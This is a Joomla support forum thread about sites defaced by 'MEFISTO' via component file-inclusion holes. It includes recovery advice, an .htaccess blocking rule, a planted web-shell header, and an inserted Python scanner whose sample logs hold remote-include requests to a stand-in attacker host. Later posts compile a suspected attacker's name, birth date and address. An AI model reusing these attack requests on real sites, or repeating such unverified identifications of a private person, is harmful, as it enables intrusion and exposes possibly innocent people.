The Joomla! Forum ™



 Post subject: Hacked by MEFISTO
PostPosted: Wed Jul 26, 2006 4:46 am 
Joomla! Intern

Joined: Mon Sep 26, 2005 4:37 am
Posts: 67
Location: Denver
Well, looks like I stepped away from my site for about a month and got hacked. I guess I'm posting because I'm hoping if someone looks at the page they can see the errors and maybe give a little hand.

I can't give much info, but can investigate. I had joomla 1.0.9 and had several components. I am not a master joomla user like some of the other threads I read about this. I'm just posting hoping it might get some questions that I can try and investigate and answer.

Here's my site, just happened in the last couple of days. I haven't checked in about a week.

http://www.prettymess.net/main/

Man, I really put a lot of work into this site and it was just about my recording studio. I guess I was naive to believe that I was not going to be targeted by someone with too much time on their hands. My mistake.

(I'm sure you can probably sense the defeat in my post, this really bums me out)

_________________
If you heard that...you should be the engineer!
http://www.prettymess.net


 Post subject: Re: Hacked by MEFISTO
PostPosted: Wed Jul 26, 2006 5:48 am 
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17321
Location: **Translation Matters**
1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig"; you will certainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Jul 27, 2006 2:37 pm 
Joomla! Intern

Joined: Mon Sep 26, 2005 4:37 am
Posts: 67
Location: Denver
Ext Cal, Joombook, and joomlaxplorer, I believe.

I do recall a little trouble with my ext cal first.

_________________
If you heard that...you should be the engineer!
http://www.prettymess.net


 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Jul 27, 2006 4:20 pm 
Joomla! Explorer

Joined: Sat Sep 03, 2005 1:56 am
Posts: 334
Location: Upstate New York
infograf768 wrote:
1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig"; you will certainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).


Not just reinstalling, though. Make sure to REMOVE everything first, or go through each directory and clean it. I had at least a hundred malicious script files interspersed in my Joomla folders AND the .htaccess files were all hacked too.

_________________
Thanks!
Aaron


 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Jul 27, 2006 4:31 pm 
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17321
Location: **Translation Matters**
crash777 wrote:
infograf768 wrote:
1. Please list all 3pd add-ons used on your site.
2. Look at the logs and search for the string "mosconfig"; you will certainly pinpoint there the target of the hacker.

Normally, your database should be safe. It will therefore be just a matter of reinstalling Joomla (1.0.10 this time) and the right add-ons (updated to the new non-vulnerable versions obviously).


Not just reinstalling, though. Make sure to REMOVE everything first, or go through each directory and clean it. I had at least a hundred malicious script files interspersed in my Joomla folders AND the .htaccess files were all hacked too.


Right.  ;)

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Jul 27, 2006 4:58 pm 
Joomla! Hero

Joined: Sun Aug 28, 2005 5:03 pm
Posts: 2447
I believe there is an update for extcal available (forget where I read that...)


 Post subject: Re: Hacked by MEFISTO
PostPosted: Fri Jul 28, 2006 1:28 am 
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
That announcement about the security update for ExtCalendar and links to download are here: http://forum.joomla.org/index.php/topic ... #msg402249

@jproducer - check your files via FTP to see the dates on which they were changed. Since you have been away, it should be easy to spot files that were created or modified in the period you weren't doing any work on the site. In most cases, these crackers have not touched the database - a quick check through using phpMyAdmin or whatever you use for database management will tell you if your data has been compromised. If it's OK, the best thing to do would be to back up your database, back up your template folder to your PC (and check files carefully for any changes), then delete all files and do a clean install of Joomla 1.0.10. If your template is fine, it's then just a matter of adding that back in and importing your database.

Before adding back any extensions, check the 3PD security forum to make sure you don't install something known to be insecure.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info


 Post subject: Re: Hacked by MEFISTO
PostPosted: Fri Jul 28, 2006 3:38 am 
Joomla! Intern

Joined: Mon Sep 26, 2005 4:37 am
Posts: 67
Location: Denver
Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?

I know this is a newbie question, but is it possible?

_________________
If you heard that...you should be the engineer!
http://www.prettymess.net


 Post subject: Re: Hacked by MEFISTO
PostPosted: Fri Jul 28, 2006 3:40 am 
Joomla! Master

Joined: Fri Aug 12, 2005 12:38 am
Posts: 13388
Location: Sydney - Australia
jproducer wrote:
Okay, my web provider has blocked my site and given me just ftp access. Now, they said that my mysql database wasn't wrecked. Is it possible to back up my database, install joomla fresh, then put back the database to save what I had?

I know this is a newbie question, but is it possible?


Yip. Just remove and replace your Joomla files. You will lose any non-core components/modules etc. though. You might want to ensure you know how to configure your configuration.php file though... once the new files are in place, set up configuration.php to connect to the database and you should be good to go.

_________________
Brad Baker - Follow me on Google+
http://www.rochen.com - Joomla! Hosting, the correct way.
http://www.joomlatutorials.com <-- Joomla Help & Tutorials
^Now with Joomla 2.5 and Joomla 3.0 Tutorials


 Post subject: Re: Hacked by MEFISTO
PostPosted: Sat Jul 29, 2006 5:58 pm 
Joomla! Fledgling

Joined: Sat Jul 29, 2006 2:33 pm
Posts: 1
I'm another victim of this pirate called MEFISTO. My website was "defaced" using the c99shell script. The attack apparently is related to com_securityimages component.

During the minutes prior to my web site being hijacked by this [Edit by mod: watch your language. Using such terms will not help solve your problems] I found multiple requests of the form

Mod Edit: Please don't paste log files to the forums.  Thank you. -RobS

To my surprise, this URL gives access to perform all kind of operations on the filesystem. MEFISTO then proceeded to overwriting the "configuration.php" with a simple HTML page.

I have now the following in my .htaccess for protection:

Quote:
RewriteCond %{QUERY_STRING} .*mosConfig_absolute_path.*
RewriteRule .* - [F,L]


which will give an HTTP 403 error on any subsequent attempt to exploit the bug. This is admittedly not a permanent solution.


Last edited by infograf768 on Sun Jul 30, 2006 5:41 am, edited 1 time in total.
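The log check infograf768 suggested earlier in the thread (search the access log for "mosconfig") and the .htaccess rule quoted above can be combined into one detection pass. This is an added example, not code from the thread or from Joomla; the log lines are constructed samples and the component path and hostnames are placeholders. It also applies the quoted RewriteCond the way mod_rewrite does (against the raw, still percent-encoded query string, case-sensitively) so you can see which flagged requests that rule alone would have answered with 403.

```python
"""Added example (not from the thread): flag access-log requests that point
mosConfig_absolute_path at a remote URL, and show which of them the quoted
.htaccess RewriteCond would have blocked as written."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache combined format; hosts and the
# component path are placeholders, not real sites or real Joomla files.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Jul/2006:03:12:01 +0000] "GET /main/index.php?option=com_content&id=5 HTTP/1.1" 200 8123 "-" "Mozilla/4.0"
203.0.113.9 - - [26/Jul/2006:03:15:44 +0000] "GET /main/components/com_example/include.php?mosConfig_absolute_path=http://attacker.invalid/payload.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.9 - - [26/Jul/2006:03:15:50 +0000] "GET /main/components/com_example/include.php?mosConfig%5Fabsolute%5Fpath=http%3A%2F%2Fattacker.invalid%2Fnenen.txt%3F HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
203.0.113.9 - - [26/Jul/2006:03:16:02 +0000] "GET /main/.thumbs.php HTTP/1.1" 200 9021 "-" "Mozilla/4.0"
"""

# client ip, identd, user, [timestamp], "METHOD target proto", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The thread's RewriteCond pattern. mod_rewrite tests %{QUERY_STRING} raw
# (still percent-encoded) and, without [NC], case-sensitively.
HTACCESS_PATTERN = re.compile(r".*mosConfig_absolute_path.*")


def htaccess_rule_matches(raw_query: str) -> bool:
    """True if the quoted rule would have answered this query string with 403."""
    return HTACCESS_PATTERN.match(raw_query) is not None


def rfi_hits(log_text: str) -> list:
    """One record per request whose mosConfig_absolute_path is an off-site URL.

    Keys and values are percent-decoded and the key is compared
    case-insensitively, so encoded or re-cased variants are still reported.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue  # not a combined-format line: skip it rather than crash
        target = urlsplit(m.group("target"))
        for key, value in parse_qsl(target.query, keep_blank_values=True):
            if key.lower() != "mosconfig_absolute_path":
                continue
            # Joomla sets this to a local directory; a URL scheme means the
            # include path is being redirected to a remote host.
            if value.lower().startswith(("http://", "https://", "ftp://")):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "path": target.path,
                    "url": value,
                    "status": int(m.group("status")),
                    "caught_by_htaccess": htaccess_rule_matches(target.query),
                })
    return hits


if __name__ == "__main__":
    for h in rfi_hits(SAMPLE_LOG):
        print(f'{h["time"]} {h["ip"]} {h["path"]} -> {h["url"]} '
              f'(htaccess rule blocks: {h["caught_by_htaccess"]})')
```

On the samples, both off-site includes are reported, but only the first is matched by the quoted rule; adding [NC] and matching on the decoded request would close that gap at the web-server layer, while the real fix remains updating the vulnerable extension.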

 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 07, 2006 5:45 pm 
Joomla! Intern

Joined: Sun Apr 09, 2006 4:01 pm
Posts: 60
my site:

/index.php:
Code:
<html>
<head>
<meta http-equiv="Content-Language" content="tr">
<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>HaCKed By MEFISTO</title>
</head>

<body bgcolor="#000000" text="#808080">

<p align="center"> </p>
<p align="center"> </p>
<p align="center">
<img src="http://img301.imageshack.us/img301/6885/takeittuxlo5.jpg"

width="200" height="300"></p>
<p align="center"> </p>

<p align="center"><font size="6"> HACKED By MEFISTO </font></p>
<p align="center"><font size="5">it's Not Hack..it's ******** BabE </font></p>
<p align="center"><font size="5">MefistoFales@HotmaiL.COM</font></p>
<p align="center"><font size="5">ThanKs All My Friends..</font></p>
<p align="center"><font size="5">HACKED</font></p>



i find:

"/" added c99.php
"/components/com_jd-wiki/lib/tpl/default/" added .thumbs.php


in .thumbs.php:

Code:
<?php
/*
******************************************************************************************************
*
*               c99shell.php v.1.0 pre-release build #16
*                     Freeware license.
*                         [removed].
*  [description line in Russian; survives only as mojibake and cannot be recovered]
   http://[removed].ru/releases/c99shell
*
*  WEB: http://[removed].ru
*  ICQ UIN #: 656555
*
*  [feature list in Russian; survives only as mojibake and cannot be recovered]
.
.
.
.


in c99.php:

Code:
*               c99shell.php v.1.0 beta


my site log in Attach:
[removed by moderator=--NEVER post vulneratble logs!]

_________________
### Joomla! AutoIt! ###
Joomla! Chinese Community Platform [Chinese GMT +8] http://www.autoit.cn


Last edited by nathandiehl on Mon Aug 07, 2006 6:08 pm, edited 1 time in total.

 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 07, 2006 7:12 pm 
Joomla! Guru

Joined: Sat Sep 10, 2005 10:31 pm
Posts: 842
jd-wiki has been updated:
http://forge.joomla.org/sf/frs/do/viewR ... components

joomla_com_jd-wiki_v1.0.3:
http://forge.joomla.org/sf/frs/do/downl ... s6415?dl=1

You only need to update the template files though:
http://forum.joomla.org/index.php?topic=83724.new#new

_________________
We may not be able to control the wind, but we can always adjust our sails


 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 07, 2006 7:14 pm 
Joomla! Ace

Joined: Wed Aug 17, 2005 10:12 pm
Posts: 1827
Location: Germany-Bad Abbach
There is no need to install the new version completely; only unzip and replace the templates default and nucleus in /components/com_jd-wiki/lib/tpl. That's it if you only want to update.

If you have Register Globals Off you are secure, but to be sure also update the templates; the Remote Include Vulnerability works only with RG = On.

_________________
The "Humor, Fun and Games" forum has  more than 2500 Posts, so why not build a "Humor, Fun and Games Working" Group?
.....
Malicious tongues say we have this WG right from the start, they call it core team :D


Last edited by Predator on Mon Aug 07, 2006 7:24 pm, edited 1 time in total.

 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 07, 2006 7:21 pm 
Joomla! Intern

Joined: Sun Apr 09, 2006 4:01 pm
Posts: 60
;) thank all!

_________________
### Joomla! AutoIt! ###
Joomla! Chinese Community Platform [Chinese GMT +8] http://www.autoit.cn


 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Aug 14, 2006 2:40 pm 
Joomla! Fledgling

Joined: Sun Sep 04, 2005 7:43 am
Posts: 4
Location: Kampala, Uganda
Just a bit of googling:

mefistofales@hotmail.com brings you a lot of sites that have been hacked by this ingenious fellow. But no info. Although there is a lot of Turkish around these pages, somehow...

Doing a search for mefistofales brings up more interesting stuff, amongst which 3 profiles, one in Czech, one in Romanian and this one, in Turkish:

http://www.blogcu.com/mefistofales

how many people would use this nickname and speak turkish?

There is an email address: yardimciel@gmail.com And a profile page:

http://www.blogcu.com/mefistofales/profile/

with this info:

Blog: ve ve ve
hoping to be a place where you can find everything

• Full name: selcuk yardimciel
• Gender: Male
• Date of birth: November 12, 1983 (Age: 22)
• Location: ankara, Turkiye
• Blog category: Diğer (Other)

Posts written: 0 entries
Comments written: 0 comments
Comments received: 0 comments
Registration date: 10 May 2006
Last login: 19 May 2006

Is there anyone who reads turkish? For example, what does Diger stand for?

The attack on my server was performed using a script hosted under a Yahoo account called sikat_pl. You can see the code here: http://geocities.com/sikat_pl/nenen.txt
Sikat, btw, seems to be a Filipino word if you google for it.

The IP address from where the attack was staged was 125.160.81.175. I can't trace that address, even with http://www.ripe.net; my ISP does not allow me to do traceroutes either.

The second hacker btw was By_CrueLKurt@hotmail.com, and he also seems to master the turkish language. I think he just started, because google does not reveal a lot of information about this fellow.

Do other people have similar logs?

BTW, this post blocked the attack: http://forum.joomla.org/index.php/topic,75376.0.html

I just went into the backend of my website. I have a statistics component running. and guess what? It shows the last visitor! And guess what? He is from Turkey! And guess what? He has an ADSL modem. It's happily located at

dsl.static8510111679.ttnet.net.tr

If you were also hacked by this Mefisto guy, you can send an email to his provider at musteridestek@ttnet.net.tr, asking for the guy's name and address so that you can file a lawsuit against him. Given the fact that he seems to be relatively active, and Turkey really wants to show it is ready to join the EU, I expect they will answer positively to this request.

_________________
OpenSource from Africa
http://www.mountbatten.net


Last edited by batje on Mon Aug 14, 2006 3:03 pm, edited 1 time in total.

 Post subject: Re: Hacked by MEFISTO
PostPosted: Tue Aug 15, 2006 12:00 pm 
Joomla! Apprentice

Joined: Thu Feb 16, 2006 9:40 pm
Posts: 31
Location: Detroit, MI
Yeah, there has to be some sort of security hole in joomla. I am on the latest 1.0.10 and 3 of my sites were hit.

Only the index.php was rewritten on each site (at least, all I could find).

Might be something to look into. I have not been able to find any c99.php script. The only components are:

joomlaxplorer (latest version)
my comment (this was installed the day it was hacked; latest version)
community builder (updated a week ago after the new security release)

Hope this helps you figure it out.

_________________
~Chilifrei64
http://www.chilifrei.net
http://www.lazynetworkadmin.com


 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Sep 10, 2007 2:17 pm 
Joomla! Fledgling

Joined: Mon Sep 10, 2007 2:11 pm
Posts: 1
Whoever this Mefisto is, he's nothing but a low-life hacker wannabe, any real hacker with any shred of dignity wouldn't stoop to something as low as trashing your website..

_________________
Find your dryer parts the easy way...


 Post subject: Re: Hacked by MEFISTO
PostPosted: Mon Sep 10, 2007 3:35 pm 
Joomla! Apprentice

Joined: Thu Nov 23, 2006 7:52 pm
Posts: 42
There are the details of this hackers website: http://WWW.ROOTHACKER.ORG and

His e-mail is: Mefisto@HackerMaiL.Com

Domain ID: D122651965-LROR
Domain Name: ROOTHACKER.ORG
Created On: 18-May-2006 21:19:50 UTC
Last Updated On: 21-Aug-2007 21:57:20 UTC
Expiration Date: 18-May-2008 21:19:50 UTC
Sponsoring Registrar: Directi Internet Solutions d/b/a PublicDomainRegistry.Com
(R27-LROR)
Status:OK
Registrant ID: DI_4725324
Registrant Name: Neo Anderson
Registrant Organization: A.S
Registrant Street1: Kadikoy iskele caddesi no:12
Registrant Street2:
Registrant Street3:
Registrant City: kadikoy
Registrant State/Province: Istanbul
Registrant Postal Code: 06000
Registrant Country: TR
Registrant Phone: +212.5555555

The same info for Admin and Technical contact.

His name is probably false [ref: Matrix] , but you never know. The address seems a legit personal home address.

The IP for these nameservers is: 80.93.221.97

The name servers are:
ROOT.ROOTHACKER.ORG
DAMAR.ROOTHACKER.ORG

Address DN: 97.221.93.80.in-addr.arpa
Type: name
Value: host-80-93-221-97.teklan.com.tr

He has had 22 unique nameserver changes for this domain within the last year.


Other domain associations: hackturkiye.net as well as hackyurkiya.com


As his website contains illegal material, his illegal activity is attributable with a Google search and he seems to be hosting the site at home, I'd complain to the Domain Name Registrar of .org domains and complain to the registering agent, Directi Internet Solutions, who are based in the USA, requesting deletion of the domain name.


Last edited by Nibblers on Mon Sep 10, 2007 3:54 pm, edited 1 time in total.

 Post subject: Re: Hacked by MEFISTO
PostPosted: Thu Aug 28, 2008 12:17 pm 
Joomla! Apprentice

Joined: Thu Nov 23, 2006 7:52 pm
Posts: 42
Some news - this person was behind the organisation many joomla hackers came from including MEFISTO...

http://thebellwetherdaily.[URL banned].com/2008/03/fbi-probing-ohio-based-computer-hacker.html

Sunday, March 02, 2008
FBI Probing Ohio-based Computer Hacker: European Webhost Targeted From Cincinnati Suburb?

CINCINNATI (TDB) -- The FBI's computer crimes squad is on the trail of an Ohio hacker suspected of defacing Internet sites that use a company in Finland, Scene Group Oy, as their webhost. One of the targeted 'net sites reportedly was BahiaNetStore.com, which markets Brazilian-themed women's apparel. A federal magistrate authorized a search warrant last week for a Butler County home near Cincinnati where the hacker may have operated under the online screen name, or hacker tag, "Evilthoutz." No charges have been filed.

Scene Group is a private firm based in Pori, a city of more than 100,000 residents that is the 10th largest in Finland. A company official, Mikko Kivinen, is identified in a federal court affidavit obtained by The Daily Bellwether as first reporting the hacking incidents last November 28. Kivinen later traced the suspected hacker to an online bulletin board and a page on MySpace. Kivinen told the FBI his company was a target:

"Kivinen also stated that Evilthoutz was successful in hacking into the company's server and forwarding several e-mails to the e-mail address *****. During the hack, Evilthoutz tried to change the root password of the server and was unsuccessful. Evilthoutz then called the company hosting the servers, located in Texas, in an attempt to socially engineer the root password. Again, Evilthoutz was unsuccessful in changing the root password. Kivinen noted that the last website defacement occurred on December 27, 2007. Kivinen had no idea why Evilthoutz targeted his company."

The FBI said a confidential informant has contacted the suspected hacker online and discussed website defacements. Other records about Evilthoutz were subpoenaed from Microsoft and Cincinnati Bell, which operates a highspeed Internet service called Zoomtown.

